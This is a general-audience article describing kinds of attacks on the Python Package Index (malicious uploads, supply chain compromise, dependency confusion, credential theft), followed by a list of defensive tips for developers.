The Most Dangerous Attacks Found on PyPI

PyPI, or the Python Package Index, is a repository of software packages for the Python programming language. It is a hub where Python developers can publish and share their libraries and packages. PyPI makes it easier for others to discover, install, and use Python software components.

As of 2023, the index hosts over 445.000 packages. Therefore, it’s no surprise that PyPI is a critical resource in the Python ecosystem and is popular worldwide.

Sadly, as with any online platform, PyPI and its users can be susceptible to many security attacks. Also, the decentralized nature of the hub makes it particularly vulnerable to bad actors. Let’s have a look at some of the most critical attacks that may affect PyPI and its users:

Malicious Package Uploads

Malicious package uploads are by far the most significant risk in the PyPI catalog. In fact, due to the volume of malicious packages, the maintainers were forced to temporarily halt new user sign-ups and uploads to the index in May 2023. Attackers may attempt to upload packages to PyPI that contain malicious code.

These packages can be disguised as legitimate Python libraries, making it easy for developers to install them. Once installed, these packages can execute harmful actions on the user’s system, steal sensitive information, or compromise the security of the user’s application.

One of these attacks, as reported by Ars Technica, was disguised as libraries for different applications. Instead, the file downloaded a well-known Trojan. These sophisticated malware packages often go unnoticed by anti-virus software, which makes them particularly dangerous.

Supply Chain Attacks

Supply chain attacks target the software supply chain, aiming to compromise the integrity of packages before they even reach PyPI. Attackers may compromise the development environment, build process, or distribution channels to inject malicious code into packages before they are uploaded to PyPI. Supply chain attacks are becoming increasingly sophisticated, as detailed by InfoSecurity Magazine. This particular attack targeted popular tools on the index, such as vConnector and eth-tester.

Dependency Confusion

Dependency confusion is related to supply chain attacks, but in this case, the aim is to fool users through impersonation. This attack aims to publish packages with the same name as legitimate packages. Developers unknowingly install malicious packages instead of internal ones, potentially exposing sensitive data or introducing system vulnerabilities.

One such attack occurred in December 2022, concerning the popular machine-learning tool PyTorch.

Credential Theft

If a PyPI developer’s credentials (username and password) are compromised, attackers can upload malicious packages under the developer’s name. This can lead to the distribution of harmful code to unsuspecting users. And it’s not just developers. The site’s maintainers could also have been compromised at some point. This may have been the case in a dangerous hack uncovered by Sonatype in March 2023.

These risks might make PyPI seem like a bleak landscape. However, the truth is that bad apples shouldn’t put you off. PyPI’s benefits outweigh the risks, so there’s no reason to leave. With a range of security protocols, we can make navigating the repository a safe and productive activity.

How to Stay Safe?

Here are some general strategies to help mitigate these attacks:

  • Verify Package Authenticity. Always verify the authenticity and integrity of packages before installation. Use package signatures when available and compare checksums with official sources.
  • Dependency Management. Keep your project’s dependencies updated and regularly audit them for security vulnerabilities. Use tools like pipenv, poetry, or requirements.txt to manage dependencies effectively.
  • Multi-Factor Authentication (MFA). Enable multi-factor authentication for your PyPI account. This is a great way to add an extra layer of security to your credentials.
  • Use VPNs and Secure Connections. Use VPNs to secure your internet connection, especially when accessing PyPI or other online resources over public Wi-Fi networks. VPNs provide a valuable layer of security and privacy to all internet activities. You can never be too safe with the growing number of online threats.
  • Audit Your Dependencies. Regularly audit your project’s dependencies for security issues and consider using tools to automate this process.
  • Be Wary of Untrusted Sources. Avoid installing packages from untrusted sources or third-party repositories. Stick to well-known and reputable packages hosted on PyPI. Sometimes, trusting your gut can go a long way, and there’s no harm in double-checking.
  • Scan files for viruses. This is an essential security practice when downloading Python packages from PyPI or any other source. Scanning files is especially relevant if you have concerns about the package’s source or authenticity.
  • Stay Informed. Stay informed about security advisories and updates related to the packages you use. Subscribe to mailing lists or security feeds for timely notifications.
  • Reporting Suspicious Activity. If you encounter a suspicious package or activity on PyPI, report it to PyPI maintainers or administrators. The PyPI community actively works to detect and address security issues. This ensures the integrity and safety of the packages hosted on the platform. Reporting is the best way to protect yourself and others and is a small act that contributes to the overall health of the index.
  • Secure Your Development Environment. Ensure that your development environment is secure by following best practices for securing your computer, using firewalls, and keeping your operating system and software up to date.

Remember that cybersecurity is an ongoing process. It’s essential to remain vigilant and proactive in identifying and mitigating potential security risks. Not only when using PyPI but with any other online service. Collaboration between maintainers and users is crucial to maintaining the security and integrity of the Python package ecosystem.